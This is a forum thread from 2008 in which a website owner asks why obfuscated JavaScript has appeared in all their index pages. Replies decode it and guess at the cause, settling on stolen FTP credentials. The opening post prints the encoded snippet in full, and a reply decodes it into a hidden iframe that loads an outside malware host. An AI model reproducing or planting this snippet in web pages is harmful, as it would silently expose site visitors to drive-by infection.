Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

JavaScript appeared on my site from nowhere!

  • 16-09-2008 7:38pm
    #1
    Registered Users, Registered Users 2 Posts: 9,228 ✭✭✭


    a friend emailed me today saying IE was saying my site had a virus, so just checked out my code and found this
    <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,32,118,97,114,32,83,116,114,61,34,49,32,104,101,105,103,104,116,61,49,32,115,116,121,108,101,61,39,118,105,115,105,98,105,108,105,116,121,58,32,104,105,100,100,101,110,39,62,60,47,105,102,114,97,109,101,62,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,100,49,103,105,120,46,110,101,116,47,105,110,100,101,120,46,112,104,112,39,32,119,105,100,116,104,61,34,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,83,116,114,46,115,117,98,115,116,114,105,110,103,40,52,55,44,57,53,41,44,83,116,114,46,115,117,98,115,116,114,105,110,103,40,48,44,52,55,41,41,32,60,47,115,99,114,105,112,116,62));</script>
    

    now i dont remember writing it and am not quote sure what it does. any clues what it is and how it got there?


Comments

  • Registered Users, Registered Users 2 Posts: 9,228 ✭✭✭Chardee MacDennis


    seems to mean this
    <script> var Str="1 height=1 style='visibility: hidden'></iframe><iframe src='http://d1gix.net/index.php' width="
    document.write(Str.substring(47,95),Str.substring(0,47)) </script>
    

    but how the f**k did it get there?

    EDIT: it got all of my index.php and index.html files, grrr...


  • Registered Users, Registered Users 2 Posts: 4,387 ✭✭✭EKRIUQ


    Mt guess is its a SQL injection that is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

    It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.


  • Registered Users, Registered Users 2 Posts: 9,228 ✭✭✭Chardee MacDennis


    i dont understand, if it is an sql injection attack how is the JS turning up in the source code of all my index files, also i strip all user input before anything is done with it, will that not protect me in some way from these attacks...


  • Registered Users, Registered Users 2 Posts: 4,387 ✭✭✭EKRIUQ


    Did you check your permisions on your index files, chmodd them to 644 which should make them unwritable on the server


  • Registered Users, Registered Users 2 Posts: 9,228 ✭✭✭Chardee MacDennis


    Namesco wrote: »
    Did you check your permisions on your index files, chmodd them to 644 which should make them unwritable on the server

    they are all at 644...


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 4,387 ✭✭✭EKRIUQ


    I'm only guessing from experience but it's more likely the login, create account or contact us page where the attacks occur.

    Here's a link which might help http://www.trap17.com/index.php/best-way-stop-sql-injections_t23083.html


  • Registered Users, Registered Users 2 Posts: 569 ✭✭✭none


    I think it's done over FTP, I mean, the files were simply replaced by the infected versions. Good thing to remember is the modification timestamp of your files so you can easily recognise if they were tampered with as in most cases copying over FTP sets the current timestamp. Basically, somebody got hold of your FTP login and password.


  • Registered Users, Registered Users 2 Posts: 9,228 ✭✭✭Chardee MacDennis


    none wrote: »
    I think it's done over FTP, I mean, the files were simply replaced by the infected versions. Good thing to remember is the modification timestamp of your files so you can easily recognise if they were tampered with as in most cases copying over FTP sets the current timestamp. Basically, somebody got hold of your FTP login and password.

    yeh i've changed all my logins and it hasnt changed back to the infected version yet!


Advertisement